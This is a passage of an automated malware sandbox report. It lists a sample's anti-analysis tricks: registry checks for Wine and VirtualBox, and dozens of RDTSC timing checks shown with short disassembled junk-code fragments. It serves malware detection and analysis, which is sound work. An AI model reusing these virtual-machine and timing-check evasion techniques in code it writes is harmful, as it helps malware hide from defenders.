                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B797 second address: A3B79B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B79B second address: A3B7AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B7AA second address: A3B7BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B74BBC1CBh 0x00000009 jbe 00007F1B74BBC1C6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B7BF second address: A3B7C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B7C9 second address: A3B7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BE2E second address: A3BE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F1B751F19D6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BE38 second address: A3BEDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F1B74BBC1D6h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F1B74BBC1C8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c and esi, dword ptr [ebp+122D3998h] 0x00000032 push 00000000h 0x00000034 mov esi, dword ptr [ebp+122D344Ah] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F1B74BBC1C8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 mov di, A9F1h 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c jmp 00007F1B74BBC1D0h 0x00000061 pop eax 0x00000062 push eax 0x00000063 pushad 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3BEDE second address: A3BEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C69F second address: A3C6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C6A3 second address: A3C6BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D46A second address: A3D46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DEE0 second address: A3DEF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DCC5 second address: A3DCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3DEF8 second address: A3DF52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F1B751F19D8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push 00000000h 0x00000023 xor dword ptr [ebp+122D36DFh], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F1B751F19D8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov esi, ebx 0x00000047 push eax 0x00000048 jng 00007F1B751F19F7h 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E76F second address: A3E773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E773 second address: A3E779 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A42EDC second address: A42EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43E9D second address: A43EB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jng 00007F1B751F19D6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46FDF second address: A47085 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1B74BBC1D4h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d jbe 00007F1B74BBC1C8h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F1B74BBC1C8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 jmp 00007F1B74BBC1D4h 0x00000036 xor dword ptr [ebp+1247084Eh], esi 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F1B74BBC1C8h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 mov ebx, dword ptr [ebp+122D2E8Eh] 0x0000005e push 00000000h 0x00000060 push edx 0x00000061 jnc 00007F1B74BBC1CCh 0x00000067 pop ebx 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jbe 00007F1B74BBC1C8h 0x00000071 pushad 0x00000072 popad 0x00000073 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46059 second address: A4607A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FDF second address: A48FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FE5 second address: A49000 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49000 second address: A4900F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F1B74BBC1C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A121 second address: A4A126 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49178 second address: A49197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a ja 00007F1B74BBC1C6h 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B14A second address: A4B165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1B751F19E7h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B165 second address: A4B1E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F1B74BBC1C8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 add bx, B807h 0x0000002a push 00000000h 0x0000002c jnp 00007F1B74BBC1CAh 0x00000032 push 00000000h 0x00000034 mov bh, 16h 0x00000036 xchg eax, esi 0x00000037 push ebx 0x00000038 jmp 00007F1B74BBC1D5h 0x0000003d pop ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F1B74BBC1CAh 0x00000047 jmp 00007F1B74BBC1D9h 0x0000004c popad 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49197 second address: A49235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1B751F19DDh 0x0000000b popad 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D380Ch] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a or edi, dword ptr [ebp+122D39ACh] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 and di, F11Dh 0x0000002c mov eax, dword ptr [ebp+122D03A9h] 0x00000032 jmp 00007F1B751F19E4h 0x00000037 push FFFFFFFFh 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F1B751F19D8h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 nop 0x00000054 pushad 0x00000055 push edi 0x00000056 push eax 0x00000057 pop eax 0x00000058 pop edi 0x00000059 jmp 00007F1B751F19E3h 0x0000005e popad 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F1B751F19DCh 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D1F7 second address: A4D204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D204 second address: A4D20A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E43B second address: A4E448 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1B74BBC1C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D43D second address: A4D441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4D441 second address: A4D445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C2EA second address: A4C2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A22D second address: A4A23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1B74BBC1CAh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4C2EF second address: A4C2F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E6B9 second address: A4E6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF534 second address: 9EF540 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1B751F19D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5EB24 second address: A5EB46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1B74BBC1D9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5EB46 second address: A5EB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jl 00007F1B751F19E2h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jp 00007F1B751F19E4h 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d jng 00007F1B751F19D6h 0x00000023 popad 0x00000024 push edi 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pop edi 0x00000028 popad 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 pushad 0x00000033 popad 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5ED02 second address: A5ED22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A637A3 second address: A637A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62A3F second address: A62A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62A45 second address: A62A4D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62A4D second address: A62A52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62BC6 second address: A62BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jnc 00007F1B751F19DEh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62E80 second address: A62E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62E84 second address: A62E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62E8C second address: A62E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A632F6 second address: A632FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A632FA second address: A632FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A632FE second address: A63310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F1B751F19D6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63310 second address: A63314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63314 second address: A6331A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6331A second address: A63327 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1B74BBC1C8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63327 second address: A6332D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6348F second address: A634B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B74BBC1D6h 0x00000009 pop edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A634B0 second address: A634C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F1B751F19DEh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68D43 second address: A68D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67D0D second address: A67D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19E3h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pushad 0x0000000d jnc 00007F1B751F19D6h 0x00000013 jng 00007F1B751F19D6h 0x00000019 jmp 00007F1B751F19DDh 0x0000001e popad 0x0000001f push esi 0x00000020 jmp 00007F1B751F19E3h 0x00000025 pop esi 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67D5A second address: A67D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67D60 second address: A67D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19E1h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F1B751F19E0h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1B751F19DFh 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67D9E second address: A67DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67DA2 second address: A67DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67DAA second address: A67DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F1B74BBC1C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68472 second address: A68476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6859F second address: A685B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F1B74BBC1CFh 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A689FC second address: A68A43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B751F19E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F1B751F19E5h 0x0000000f pop esi 0x00000010 jo 00007F1B751F19DAh 0x00000016 pushad 0x00000017 popad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F1B751F19DAh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68A43 second address: A68A57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68A57 second address: A68A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C4BF second address: A6C4CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1B74BBC1CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A334D3 second address: A334D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A334D8 second address: A334DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33A70 second address: A33A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33C17 second address: A33C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33C1B second address: A33C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a mov dword ptr [ebp+122DB5E3h], edx 0x00000010 nop 0x00000011 jmp 00007F1B751F19DDh 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F1B751F19E0h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8BB8 second address: AA8BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8BC2 second address: AA8BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1B74BBC1D1h 0x0000000d jmp 00007F1B74BBC1D9h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB03A2 second address: AB03B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1B751F19DDh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB03B3 second address: AB03D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F1B74BBC1D8h 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB03D8 second address: AB03F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1B751F19DCh 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F1B751F19D6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2B57 second address: AB2B5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
